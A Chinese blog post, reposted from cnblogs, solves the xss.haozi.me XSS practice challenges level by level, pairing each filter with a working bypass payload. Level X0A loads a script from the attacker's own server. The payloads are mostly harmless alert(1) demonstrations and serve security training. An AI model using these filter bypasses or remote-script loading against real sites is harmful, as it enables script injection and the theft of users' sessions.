码迷,mamicode.com
首页 > 其他好文 > 详细

xss.haozi靶机

时间:2020-07-14 18:21:47      阅读:78      评论:0      收藏:0      [点我收藏+]

标签:amp   textarea   转义   --   svg   image   htm   ges   技术   


X00

<script>alert(1)</script>

技术图片


X01

</textarea><script>alert(1)</script><textarea>

技术图片

X02

"><script>alert(1)</script><"

技术图片

X03

技术图片

将()替换成空字符

<script>alert`1`</script>

使用反引号

技术图片

X04

技术图片

()和反引号都过滤

<svg><script>alert(1)</script>        进行html编码   <svg><script>alert&#40;1&#41;</script>

技术图片

X05

技术图片

-->替换成了笑脸

--!><script>alert(1)</script><--

技术图片

X06

技术图片

匹配auto和on开头加=的数据,>符号,替换为_

在等号前换行

onmousedown

=alert(1)

技术图片

X07

技术图片

过滤以<开头 以>结尾的字符串

<img src=1 onerror="alert(1)"

技术图片

X08

</style ><script>alert(1)</script><style>

技术图片

X09

https://www.segmentfault.com

技术图片

https://www.segmentfault.com"></script><script>alert(1)//

技术图片

X0A

https://www.segmentfault.com@xss.haozi.me/j.js

https://www.segmentfault.com@vps地址/xss.js

技术图片

X0B

技术图片

将输?的字符串转换成?写

<svg onload=alert(1)>

html编码

<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

技术图片

X0c

<svg onload=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

技术图片

X0d

技术图片

//只能注释单行,利?换?逃逸注释,利?html的"-->"注释掉后?字符

换行

alert(1)

-->

技术图片

X0e

技术图片

未解决出来

X0f

技术图片
 
技术图片

‘);alert(1)//

技术图片
 

X10

alert(1)

技术图片

X11

技术图片

");alert(1)//

技术图片

x12

技术图片

将双引号进行了转义

\");alert(1)//

技术图片

 

 

 

 

 

 

 

 



xss.haozi靶机

标签:amp   textarea   转义   --   svg   image   htm   ges   技术   

原文地址:https://www.cnblogs.com/bingtang123/p/13300413.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!